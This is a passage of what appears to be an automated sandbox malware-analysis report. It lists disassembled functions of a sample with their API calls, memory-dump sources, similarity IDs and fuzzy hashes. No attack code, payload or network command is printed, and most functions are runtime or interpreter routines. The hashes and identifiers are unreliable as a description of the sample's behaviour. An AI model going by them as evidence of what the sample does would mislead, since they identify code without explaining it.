                                                                                                                                                                                                                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                                                                                                                Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417981
                                                                                                                                                                                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                                                                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                                                                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                                                                                                • __lock.LIBCMT ref: 004179A2
                                                                                                                                                                                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                • String ID: KERNEL32.DLL$pI
                                                                                                                                                                                                                • API String ID: 637971194-197072765
                                                                                                                                                                                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                                                                                                Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove$_malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1938898002-0
                                                                                                                                                                                                                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                                                                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                                                                                                                Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044B555
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044B578
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2737351978-0
                                                                                                                                                                                                                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                                                                                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                                                                                                Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00415253
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                                                                                                                • _free.LIBCMT ref: 0041529E
                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3638380555-0
                                                                                                                                                                                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                                                                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                                                                                                                Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                • API String ID: 3207048006-625585964
                                                                                                                                                                                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                                                                                                                Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                                                                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                                                                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 004656CA
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2945290962-0
                                                                                                                                                                                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                                                                                                Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                                                                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1457242333-0
                                                                                                                                                                                                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                                                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                                                                                                                Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15295421-0
                                                                                                                                                                                                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                                                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                                                                                                                Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                                                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                                                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                • API String ID: 780548581-3081909835
                                                                                                                                                                                                                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                                                                                                                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                                                                                                                Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                                                                                                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                                                                                                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                                                                                                                • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                                                                                                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                                                                                                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4082120231-0
                                                                                                                                                                                                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                                                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                                                                                                                Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
